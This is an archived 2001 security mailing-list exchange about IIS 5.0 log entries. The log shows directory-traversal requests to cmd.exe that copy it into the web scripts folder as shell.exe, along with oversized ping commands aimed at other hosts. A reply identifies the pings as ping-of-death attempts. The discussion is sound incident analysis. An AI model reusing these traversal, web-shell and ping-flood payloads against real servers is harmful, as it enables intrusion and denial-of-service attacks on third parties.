Re: Unicode Logs with Ping Activity

From: Vitaly Osipov (vosipovat_private)
Date: Wed Jul 11 2001 - 08:32:11 PDT

  • Next message: gattacaat_private: "Re: Subject: Unicode Logs with Ping Activity"

    those pings are Ping-of death attempts with TOS (Type Of Service)
    options - I don't know why options were used - maybe this increases the
    possibility of crashing destination machine...
    
    
    
    myrddin_eat_private wrote:
    > 
    > Would like someone to help me understand what is going on here... The 502
    > error at the end end of these entries would indcicate failures, wouldn't
    > they? I've been all through the logs on this box, and even thought at every
    > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe
    > shows a 502, it is there.
    > 
    > I'm looking at the times on the log entries and guessing that this was a
    > manual attack.
    > 
    > Also, can someone please explain what is being attempted with these pings?
    > aaa.aaa.aaa.aaa
    > bbb.bbb.bbb.bbb
    > ccc.ccc.ccc.ccc.ccc
    > ddd.ddd.ddd.ddd.ddd
    > are all unique addresses.
    > 
    > #Software: Microsoft Internet Information Services 5.0
    > #Version: 1.0
    > #Date: 2001-06-19 18:44:15
    > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
    > uri-query sc-status cs(User-Agent)
    > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
    > /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
    > /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
    > /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd
    > 502 -
    > Free, encrypted, secure Web-based email at www.hushmail.com
    > 
    >   ------------------------------------------------------------------------
    > 
    > ----------------------------------------------------------------------------
    > 
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see:
    > 
    > http://aris.securityfocus.com
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:29:09 PDT